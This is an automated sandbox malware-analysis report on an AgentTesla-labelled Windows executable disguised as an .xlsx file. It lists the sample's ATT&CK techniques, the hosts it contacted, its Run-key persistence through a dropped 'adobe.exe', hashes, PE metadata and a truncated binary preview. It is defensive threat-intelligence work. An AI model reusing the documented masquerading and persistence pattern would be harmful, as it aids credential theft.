Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	112 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
BL NBNSA240600050.xlsx.exe	74%	ReversingLabs	Win32.Trojan.AgentTesla
BL NBNSA240600050.xlsx.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Adobe\adobe.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Adobe\adobe.exe	74%	ReversingLabs	Win32.Trojan.AgentTesla

Source	Detection	Scanner	Label
https://api.ipify.org/	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	URL Reputation	safe
http://www.fontbureau.com	0%	URL Reputation	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
https://api.ipify.org/t	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://tempuri.org/DataSet1.xsd	0%	Avira URL Cloud	safe
http://s4.serv00.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.12.205	true	false		unknown
s4.serv00.com	213.189.52.181	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersG	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/DataSet1.xsd	BL NBNSA240600050.xlsx.exe, adobe.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org/t	adobe.exe, 00000004.00000002.4117501266.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4117501266.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671407520.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1813288032.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4117501266.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.1893877251.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://s4.serv00.com	BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002776000.00000004.00000800.00020000.00000000.sdmp, BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.000000000275C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4117501266.000000000335C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false
213.189.52.181	s4.serv00.com	Poland		57367	ECO-ATMAN-PLECO-ATMAN-PL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1479357
Start date and time:	2024-07-23 15:04:03 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BL NBNSA240600050.xlsx.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/4@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 431 Number of non-executed functions: 28
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: BL NBNSA240600050.xlsx.exe

Simulations

Behavior and APIs

Time	Type	Description
09:04:51	API Interceptor	5277750x Sleep call for process: BL NBNSA240600050.xlsx.exe modified
09:05:07	API Interceptor	8725936x Sleep call for process: adobe.exe modified
14:04:58	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
14:05:06	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	SecuriteInfo.com.Win64.Evo-gen.28044.10443.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	vstdlib_s64.dll.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	6OiUEubyA8.msi	Get hash	malicious	Quasar	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exe	Get hash	malicious	Conti, PureLog Stealer, Targeted Ransomware	Browse	api.ipify.org/
	482730621.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	482730621.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe	Get hash	malicious	Bunny Loader	Browse	api.ipify.org/
	lods.cmd	Get hash	malicious	Remcos	Browse	api.ipify.org/
213.189.52.181	DC74433Y7889021.xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PRE ALERT Docs_PONBOM01577.xlsx.exe	Get hash	malicious	AgentTesla	Browse
	Ship Docs YINGHAI-MANE PO 240786.xlsx.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s4.serv00.com	DC74433Y7889021.xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	213.189.52.181
	PRE ALERT Docs_PONBOM01577.xlsx.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	Ship Docs YINGHAI-MANE PO 240786.xlsx.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
api.ipify.org	Cotizaci#U00f3n.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	Doc_322_0105.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	SecuriteInfo.com.Win32.PWSX-gen.11837.10886.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.26.13.205
	Purchase, Order no X850580.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	po.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	INV 66077.xls	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	PO 1068 PDF.gz.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	LCWGT83qLa.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	172.64.41.3
	Cotizaci#U00f3n.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	5i4hBrTNHm.rtf	Get hash	malicious	AgentTesla	Browse	172.66.43.27
	Doc_322_0105.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	fd0987654345.exe	Get hash	malicious	Remcos	Browse	188.114.97.3
	DST0987654567800PO.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	D9p6evtbwe.rtf	Get hash	malicious	Unknown	Browse	172.66.40.229
	FG678900987600.exe	Get hash	malicious	Remcos	Browse	188.114.97.3
	iWRmEn1DDT.rtf	Get hash	malicious	Remcos	Browse	172.66.43.27
	4Ear91jgQ7.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
ECO-ATMAN-PLECO-ATMAN-PL	DC74433Y7889021.xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	213.189.52.181
	https://skposta.serv00.net/	Get hash	malicious	Unknown	Browse	128.204.223.100
	PRE ALERT Docs_PONBOM01577.xlsx.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	BOQ_Algeemi_SharePoint_Tender_3768889756.xksx.exe	Get hash	malicious	AgentTesla	Browse	91.185.189.19
	http://10f4cf3.wcomhost.com/	Get hash	malicious	Unknown	Browse	85.194.241.205
	Ship Docs YINGHAI-MANE PO 240786.xlsx.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	BOQ_Algeemi_SharePoint_Tender.xlsx.exe	Get hash	malicious	AgentTesla	Browse	91.185.189.19
	OriginalMessage.txt.msg	Get hash	malicious	HTMLPhisher	Browse	31.186.83.254
	Invoice_23257538_PDF.wsf	Get hash	malicious	GuLoader	Browse	31.186.83.248
	WEB-SAT_base.apk	Get hash	malicious	Unknown	Browse	77.79.227.218

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Cotizaci#U00f3n.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	Doc_322_0105.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	4Ear91jgQ7.exe	Get hash	malicious	FormBook	Browse	104.26.12.205
	kHeNppYRgN.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.12.205
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	QUOTATION_JULQTRA071244.PDF.scr.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	QUOTATION_JULQTRA071244.PDF.scr.exe	Get hash	malicious	Unknown	Browse	104.26.12.205

Process:	C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	5.352427679901606
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
MD5:	97AD91F1C1F572C945DA12233082171D
SHA1:	D5E33DDAB37E32E416FC40419FB26B3C0563519D
SHA-256:	3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
SHA-512:	8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\adobe.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	5.352427679901606
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
MD5:	97AD91F1C1F572C945DA12233082171D
SHA1:	D5E33DDAB37E32E416FC40419FB26B3C0563519D
SHA-256:	3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
SHA-512:	8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Download File

Process:	C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	830464
Entropy (8bit):	7.857229543409421
Encrypted:	false
SSDEEP:	24576:p+1bAypcVKaAbK7hZ9Auf0K/KoLO8CZXCmFv:oVOca8K7f9rcK/HGl
MD5:	7DC8BA9345DE935C7B90EA6C61F3464F
SHA1:	78786835C8B7B91C0223E970A45B50176EB96B33
SHA-256:	FCA147EE2F07C81F599B17E6957D45B40DD29518E9FF97BB90B742EA1C27BCEA
SHA-512:	47AD7A37A6B95873120F256C957EAF5DE91A2B6C05E86238C79F5DAAE130974B1B10C01459E8E2C0AE0C8B051225C1784C20807F2E9813D7ACB3760B4A9A29F3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ou...............0..N...\.......m... ........@.. ....................................@.................................Ym..O........X...........................B..p............................................ ............... ..H............text....M... ...N.................. ..`.rsrc....X.......Z...P..............@..@.reloc..............................@..B.................m......H............u......0...,5...............................................0..L.........}.....(.......(......(............s......(.....o......( ....o!.....(".....0..K.........}........(#........($.....,5...(............s......(.....o......(.....o!....8.....r...p.X...(%...o&...tX.......('..........9.....s.........s(...s)...o.......o+...(,.......o-...(........o/...(0.......o1...(2.......o3...(4.......o5...(6.........(7.....(......+....s(...s)...(*........(8...........s......(..

C:\Users\user\AppData\Roaming\Adobe\adobe.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.857229543409421
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	BL NBNSA240600050.xlsx.exe
File size:	830'464 bytes
MD5:	7dc8ba9345de935c7b90ea6c61f3464f
SHA1:	78786835c8b7b91c0223e970a45b50176eb96b33
SHA256:	fca147ee2f07c81f599b17e6957d45b40dd29518e9ff97bb90b742ea1c27bcea
SHA512:	47ad7a37a6b95873120f256c957eaf5de91a2b6c05e86238c79f5daae130974b1b10c01459e8e2c0ae0c8b051225c1784c20807f2e9813d7acb3760b4a9a29f3
SSDEEP:	24576:p+1bAypcVKaAbK7hZ9Auf0K/KoLO8CZXCmFv:oVOca8K7f9rcK/HGl
TLSH:	7605014723A4CB41F1BA37F9687A441407B1BD2A59A5CA5F4DCD3CFF58B1B804A22367
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ou...............0..N...\.......m... ........@.. ....................................@................................

File Icon


Icon Hash:	31d89a929298d027

Static PE Info

General

Entrypoint:	0x4c6dae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xA1756FE1 [Wed Nov 3 04:15:29 2055 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
inc edi
add byte ptr [edi+00h], al
inc edx
add byte ptr [eax+eax], dh
inc ecx
add byte ptr [eax], bh
add byte ptr [eax+eax], dh
inc esi
add byte ptr [edi], dh
add byte ptr [5A003300h], dh
add byte ptr [ecx], bh
add byte ptr [eax], bh
add byte ptr [eax+eax], dh
aaa
add byte ptr [34005A00h], dh
add byte ptr [ecx+00h], bl
push esp
add byte ptr [eax+eax+00h], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
